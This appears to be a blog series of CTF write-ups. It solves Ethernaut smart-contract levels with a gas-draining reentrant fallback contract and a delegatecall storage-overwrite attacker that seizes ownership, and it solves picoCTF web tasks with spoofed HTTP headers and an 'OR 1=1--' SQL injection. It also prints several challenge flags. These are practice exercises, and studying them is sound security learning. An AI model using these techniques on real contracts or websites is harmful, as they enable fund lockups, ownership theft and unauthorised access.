23 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
This is a simple wallet that drips funds over time. You can withdraw the funds slowly by becoming a withdrawing partner.
If you can deny the owner from withdrawing funds when they call withdraw() (whilst the contract still has funds, and the transaction is of 1M gas or less) you will win this level.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import '@openzeppelin/contracts/math/SafeMath.sol';
contract Denial {
using SafeMath for uint256;
address public partner; // withdrawal partner - pay the gas, split the withdraw
address payable public constant owner = address(0xA9E);
uint timeLastWithdrawn;
mapping(address => uint) withdrawPartnerBalances; // keep track of partners balances
function setWithdrawPartner(address _partner) public {
partner = _partner;
}
// withdraw 1% to recipient and 1% to owner
function withdraw() public {
uint amountToSend = address(this).balance.div(100);
// perform a call without checking return
// The recipient can revert, the owner will still get their share
partner.call{value:amountToSend}("");
owner.transfer(amountToSend);
// keep track of last withdrawal time
timeLastWithdrawn = now;
withdrawPartnerBalances[partner] = withdrawPartnerBalances[partner].add(amountToSend);
}
// allow deposit of funds
receive() external payable {}
// convenience function
function contractBalance() public view returns (uint) {
return address(this).balance;
}
}
Writeup
There is a line partner.call{value:amountToSend}(""); in the function withdraw(). So we can create a parner contract and write some malicious code in fallback function to drain all gas.
- Get new instance.
- Create a new contract.
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
interface IDenial {
function withdraw() external;
function setWithdrawPartner(address _partner) external;
}
contract DenialAttacker {
fallback () external payable {
IDenial(msg.sender).withdraw();
}
}
- Compile and deploy.
- Call
setWithdrawPartner method.
await contract.setWithdrawPartner('YOUR_DENIALATTACKER_CONTRACT_ADDRESS')
- Submit instance ξ( ✿>◡❛)
23 Sep 2022
Difficulty: 🌕🌕🌕🌕🌑
This contract utilizes a library to store two different times for two different timezones. The constructor creates two instances of the library for each time to be stored.
The goal of this level is for you to claim ownership of the instance you are given.
Things that might help
- Look into Solidity’s documentation on the
delegatecall low level function, how it works, how it can be used to delegate operations to on-chain. libraries, and what implications it has on execution scope.
- Understanding what it means for
delegatecall to be context-preserving.
- Understanding how storage variables are stored and accessed.
- Understanding how casting works between different data types.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Preservation {
// public library contracts
address public timeZone1Library;
address public timeZone2Library;
address public owner;
uint storedTime;
// Sets the function signature for delegatecall
bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));
constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) public {
timeZone1Library = _timeZone1LibraryAddress;
timeZone2Library = _timeZone2LibraryAddress;
owner = msg.sender;
}
// set the time for timezone 1
function setFirstTime(uint _timeStamp) public {
timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
}
// set the time for timezone 2
function setSecondTime(uint _timeStamp) public {
timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
}
}
// Simple library contract to set the time
contract LibraryContract {
// stores a timestamp
uint storedTime;
function setTime(uint _time) public {
storedTime = _time;
}
}
Writeup
The key to solve this level is delegatecall(). You can learn the detail in this website.
- Get new instance.
- Create a new contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract PreservationAttacker {
address public timeZone1Library;
address public timeZone2Library;
address public owner;
uint storedTime;
function setTime(uint _time) public {
owner = msg.sender;
}
}
- Compile and deploy. My contract address is
0x666EEeb5D57C908b582155D28A2fD46193f07325.
- Convert datatype
address to uint256 by padding 24 zero to the left of address. I got 0x000000000000000000000000666EEeb5D57C908b582155D28A2fD46193f07325.
- Call the method to change address
timeZone1Library to our malicious contract address.
await contract.setFirstTime('0x000000000000000000000000666EEeb5D57C908b582155D28A2fD46193f07325')
- Check
timeZone1Library address.
await contract.timeZone1Library()
// '0x666EEeb5D57C908b582155D28A2fD46193f07325'
- Call the method to invoke malicous
setTime(uint256) to change owner to our account address.
await contract.setFirstTime('123')
- Check
owner.
await contract.owner()
// '0xa450CD84Ac7E1cC1D6c5b28b275B7706E1C4e065' <- my account address!
- Submit instance ξ( ✿>◡❛)
22 Sep 2022
PicoCTF 2021 / Web Exploitation
Description
Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn
http://mercury.picoctf.net:52362/
Writeup
Note that everyone ‘s port and flag are different!
- Visit this site, it says: Only people who use the official PicoBrowser are allowed on this site! So I use ThunderClient to request website and change
User-Agent in the header to PicoBrowser.
- It says: I don’t trust users visiting from another site. So we can add the key of
Referer with the value http://mercury.picoctf.net:52362/ to the header and request website again.
- It says: Sorry, this site only worked in 2018. So we can add the key of
Date with the value 1 Jan 2018 to the header and request website again.
- It says: I don’t trust users who can be tracked. So we can add the key of
DNT which means do not track with the value 1 to the header and request website again.
- It says: This website is only for people from Sweden. So we can add the key of X-Forwarded-For, which can change the originating IP, with the value random Sweden IP address to the header and request website again.
- It says: You’re in Sweden but you don’t speak Swedish? So we can add the key of
Accept-Language with the value sv to the header and request website again. Then we can get the flag! ٩(^ᴗ^)۶
- Header should be like :
22 Sep 2022
PicoCTF 2022 / Web Exploitation / sql
Description
Can you login to this website?
Writeup
- Launch instance.
- Login with random username and password. I use
admin as username and xx as password.
- Now we know the SQL query command, we can use SQL Injection to exploit it.
- Use
OR 1=1--' as username and password to login again.
- The flag is hidden. So inspect elements to find it.
- Here’s flag:
picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21} ٩(^ᴗ^)۶
22 Sep 2022
PicoCTF 2022 / Web Exploitation / sql
Description
Connect to this PostgreSQL server and find the flag!
Writeup
- Launch instance.
- Open Websell and Log in .
- Connect to sql by command
psql -h saturn.picoctf.net -p 61408 -U postgres pico and input the password.
- Use
\dt command to show all table, there is only one table, which is named flags.
- Use
SELECT * FROM flags; command to check the content of table.
- Here’s flag:
picoCTF{L3arN_S0m3_5qL_t0d4Y_31fd14c0} ٩(^ᴗ^)۶